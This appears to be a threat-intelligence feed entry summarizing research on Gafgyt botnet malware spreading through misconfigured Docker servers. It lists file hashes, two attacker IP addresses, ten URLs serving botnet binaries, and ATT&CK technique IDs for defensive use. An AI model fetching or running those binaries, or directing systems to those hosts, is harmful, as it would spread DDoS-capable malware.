Today > 1 Critical | 2 High | 2 Medium vulnerabilities   -   You can now download lists of IOCs here!

Gafgyt Malware Broadens Its Scope in Recent Attacks

Dec. 3, 2024, 11:03 p.m.

Tags
privilege-escalation
ddos
iot
botnet
gafgyt
docker
api
2024-12-03
lizkebab
container
bashlite
External References
Description

Trend Micro researchers have identified threat actors exploiting misconfigured Docker servers to spread Gafgyt malware, traditionally known for targeting IoT devices. This shift in behavior involves attackers creating Docker containers based on legitimate 'alpine' images to deploy the malware. The attack sequence includes attempts to deploy various Gafgyt botnet binaries, with the potential to launch DDoS attacks on targeted servers. The malware uses hardcoded command-and-control server addresses and can perform DDoS attacks using multiple protocols. The attackers also employ privilege escalation techniques and attempt to discover local IP addresses. This new tactic represents a significant expansion of Gafgyt's targets beyond its usual scope.

Date

Published: Dec. 3, 2024, 6:15 p.m.

Created: Dec. 3, 2024, 6:15 p.m.

Modified: Dec. 3, 2024, 11:03 p.m.

Indicators

f8388cba15175fa7fda8daacfd095972e1a96faaabeede411f99f42f71ae395b

f7004355f2bf653d3f055bc674822f99a8ff3692a02c1aec6b727a782e37b836

ed6c93faebd9a60e132f4f952a1b516e758ce0e445b225eb702dfd2c8c2db6c0

c1c03eab6bbca461f4a9dc7395103cdb0aa018563e835150c66228f3d7edadaa

b7f0ac1551ab58a1b84ba8e63dfc98dd126f7abe686137cbffc8ff95bfbac1ba

bb2bd8819045055af5295c23d1293b2d215fabe7dcf097813b9624ab98a13976

6b385dc32daff689c1c448bf5f9151996abbac730e167a9cbfa9111591f253ea

a79a9653209c9d942dee0be597e04845fc5250880edcc5c3cb50110153925a03

68c215494fd35e097bf76eb3886b95ec66fdc707ebcf10f221b4db4ac2cd6d70

36ee47d10acbf8fbc7b16d4d237e2be567491b95dcd333856268c6c63a02f358

19778568781fd397ee2415d0a3593ffcaff4f333cdc27e52a1b23e07de08fdb6

156c85a09a1d5d753ce3fd128e0bb6097bb5b18e6cc0ffe6f9bc99a218a21ed9

0b7e14e3305fd25b250ad494c014b0f8dfefaf0f3e8413bd797db12dd2eb9d8c

178.215.238.31

178.215.238.24

http://178.215.238.31/bins/atlas.sh4

http://178.215.238.31/bins/atlas.mips

http://178.215.238.31/bins/atlas.mipsel

http://178.215.238.31/bins/atlas.m68k

http://178.215.238.31/bins/atlas.i686

http://178.215.238.31/bins/atlas.i586

http://178.215.238.31/bins/atlas.arm7

http://178.215.238.31/bins/atlas.arm6

http://178.215.238.31/bins/atlas.arm5

http://178.215.238.31/bins/atlas.arm4

Download all indicators here!

Attack Patterns

Lizkebab

Bashlite

Gafgyt

T1611

T1610

T1059.004

T1016

T1105

T1071

T1498

T1133